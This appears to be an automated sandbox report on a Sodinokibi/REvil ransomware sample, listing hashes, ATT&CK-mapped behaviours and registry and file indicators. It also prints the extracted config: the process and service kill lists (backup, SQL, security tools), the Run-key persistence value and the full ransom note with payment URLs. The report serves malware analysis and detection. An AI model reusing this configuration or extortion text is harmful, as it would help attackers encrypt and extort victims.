sodinokibi | ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae

Resubmissions

28-07-2024 16:34

240728-t3cqnasfml 10

28-07-2024 16:18

240728-tsfdsssbpr 10

26-07-2024 07:19

240726-h5sn4stdnm 10

Analysis

max time kernel
129s
max time network
132s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
28-07-2024 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
Size

139KB
MD5

72d9db37db04e51f61fc7b3424a009d2
SHA1

3be50ec5fced0b0f0e9f1795ecbafc7538f28426
SHA256

ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae
SHA512

be13842d7b615579714ac1dab4f43e11207075a4a3d09ec2aae2c87727ccdde2dece33c2394b20e0e669cd03f8c8f42924bf8d6cdaf1ab9489d9b555fb1a4281
SSDEEP

1536:+DvcP3aXhpshwVs5OE8yNcYQpG2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOx9VG8:5lSVhaNcYMkgnBR5uiV1UvQFOxXGCH

Score

10^/10

sodinokibi $2a$10$ctl6mpbcozzcr.aru3gxp.pcftg0jof6upmmrky0hc0o.x.alltz.4085 aspackv2 discovery persistence ransomware spyware stealer

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr

Attributes

net
true
pid
$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.
prc
sqbcoreservice

dbsnmp

mydesktopservice

outlook

ocomm

excel

mydesktopqos

isqlplussvc

onenote

tbirdconfig

msaccess

encsvc

infopath

steam

thebat

agntsvc

sql

visio

wordpad

winword

dbeng50

powerpnt

firefox

xfssvccon

mspub

oracle

thunderbird

ocssd

synctime

ocautoupds
ransom_oneliner
All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions
ransom_template
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
sub
4085
svc
memtas

mepocs

backup

sophos

sql

svc$

veeam

vss

Extracted

Path

C:\Users\8w8kz1-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 8w8kz1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/525CA20A28D1382F 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/525CA20A28D1382F Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: XcHTUcyvK8W6z4FE79dD+RYAcUobNMfN/U4pmpIe7IISYsC57rYUV827gicKSn/I eple3UdxGBwZxfqbHdUBNKauBYsxaHEVM8LT5VmHUaXcjaSxwEgDR7y7wO581bYc fxO0KSAxAzXRPDzhsyT30TrvJ+15odNZjSPgg4qCAs/i9jNUnmRITuIq2apJ/Sjs w3MYNDhD8LCuUX+MmCnDtoN6V0smdQnsY2sKARl8S6VT1eroIHJP3Ceywi0sysDl M//51BQe2ioCcaETRuxjQOjul3q9j3yhiA0Xz4W5EF7PFNL0OOTdEnBufahe2jtb YvvRdBjO9WTABnLW2JQoPZ43R1lT9BK2XeUYjpiBHA1d9ui5BLuxjOZI584myQVn q82YnxuvxQ4n6sCrk0nEY/RICd5BCp3epoYDrk4vsgbL18O6QAD/zJq893XCsB// 8R8yDFO/Ss2iWmUVFfRtUxxoVhuSNcTv0NSkr5OgmpnY5Sofk/CsIryPnXvvGA/v TlDl5Xmr2LDo4bfRj0KDrLifkbZIKJQaRKcOq5+tiIwXBUcr2lS2F7HpuCUWPk2c lJOWeW9TvN1AXDRi6/cNnT6Q32CXdq221FVu3Z028rWqgfyLkt1nZw0mxNYcS9dq A8MuirLm2vNxRymCVSR+on2C5Q8qNcD6b4JQ7xaS4RPT947aBvuAfH+ZuN/kxSLS s75vBX/9TXMXFf2fFuNASSQySDvg1HxUgDnMQt+cgnG9DS3YTc0VXf+UpO7yvKdn DRbYWtxCjf3ZJ4USxvWdEltKHtFbaOKnsUiUpL6rwufLBHDBHfbM2nJS4gGTZcFg hNvim7Lrfqn6Z1TMIchx+i6dSZ/Ceo/krrNk3uJtCi9ESF+AUwz8MIBNtGk9rlDk zSPvKrLdfZBEK76Ll75ua4o2gdjYv9npsJ4HUQZ6dW4IgoJZ6KrAZKOWVm78dWjM ynnx2WjHCkOvaQL1d8KDSFgCpAH5LUhLbQncYbpFCjXMsZ40hl7N57MW4uOXQYqJ aFyIHlVS8zrxuhjYf10sFFbKObSDXXoWLou3IVUa4hugCukbHidYpNsd3T5ifZ4a d3Q979swLCTCBabCJAvb9YVuXLLrgxvo2N8KsfcCxo1MHQgqBytjsxBB0KDecre8 /z6wak+7BUkLdePnzK090R52qQgvmA0TOt7xZfX3S9dUmjvlTYnb/LlpQjAC33rY A2dGwd8JPxPefVkQ6WLSlBFtsOnNt5UlSku1RTN/uxdCiBovRP1ZjHilNNgzdAA9 SHh/nsD5BvsorfI47yX4984/BTaMubDhfiw/RycVWE2gDxC8lumgJmh/1GTxchRn KLOvHP7IiYwQJLFxAoqDRW4NcAYTSN1Ae9zwM9qL0AMf01PzCgU= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/525CA20A28D1382F

http://decryptor.cc/525CA20A28D1382F

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x0009000000023496-3.dat	aspack_v212_v242

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	Kufmxd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation	chrome.exe

Executes dropped EXE 17 IoCs

pid	Process
5080	Kufmxd.exe
988	chrome.exe
1220	chrome.exe
1536	chrome.exe
2536	chrome.exe
1528	chrome.exe
4984	chrome.exe
2020	chrome.exe
1524	elevation_service.exe
4560	chrome.exe
548	chrome.exe
4892	chrome.exe
2976	chrome.exe
2352	chrome.exe
2768	chrome.exe
304	chrome.exe
3924	chrome.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DNXeNcyLON = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe"	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\I:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\T:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\W:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\A:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\H:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\F:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\E:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\K:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\R:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\Y:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\O:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\X:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\J:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\V:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\P:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\L:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\M:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\S:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\U:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\Z:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\B:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\N:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\Q:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened (read-only)	\??\D:	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	chrome.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\h75mpmo.bmp"	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe	Kufmxd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Kufmxd.exe
File opened for modification	\??\c:\program files\NewDeny.odt	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	\??\c:\program files\UpdateGet.m4v	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\setup.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javap.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\SmartTagInstall.exe	Kufmxd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Microsoft.Notes.exe	Kufmxd.exe
File opened for modification	\??\c:\program files\BackupUnlock.mp3	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOUC.EXE	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE	Kufmxd.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	Kufmxd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe	Kufmxd.exe
File created	\??\c:\program files (x86)\8w8kz1-readme.txt	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jinfo.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoia.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaws.exe	Kufmxd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java.exe	Kufmxd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	Kufmxd.exe
File opened for modification	\??\c:\program files\TestReceive.ppsm	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\kinit.exe	Kufmxd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Cortana.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Integrator.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoadfsb.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe	Kufmxd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteim.exe	Kufmxd.exe
File opened for modification	\??\c:\program files\LockCompare.shtml	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.106\Installer\chrmstp.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ktab.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\XLICONS.EXE	Kufmxd.exe
File opened for modification	\??\c:\program files\PublishUpdate.xml	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\klist.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\orbd.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\servertool.exe	Kufmxd.exe
File opened for modification	C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe	Kufmxd.exe
File created	\??\c:\program files\8w8kz1-readme.txt	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdb.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe	Kufmxd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Solitaire.exe	Kufmxd.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\ktab.exe	Kufmxd.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\uninstall.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE	Kufmxd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\GetHelp.exe	Kufmxd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Kufmxd.exe
File opened for modification	\??\c:\program files\ExitWrite.dotx	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\servertool.exe	Kufmxd.exe
File opened for modification	C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe	Kufmxd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Kufmxd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133666581781336702"	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
2152	powershell.exe
2152	powershell.exe
988	chrome.exe
988	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeBackupPrivilege	2812	vssvc.exe
Token: SeRestorePrivilege	2812	vssvc.exe
Token: SeAuditPrivilege	2812	vssvc.exe
Token: SeTakeOwnershipPrivilege	4036	ff6a62a956cfea3ed97e71f58a3554b1caaca3275d90ab5ac7b280aafa9c1cae.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe
Token: SeShutdownPrivilege	988	chrome.exe
Token: SeCreatePagefilePrivilege	988	chrome.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
884	NOTEPAD.EXE

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe
988	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
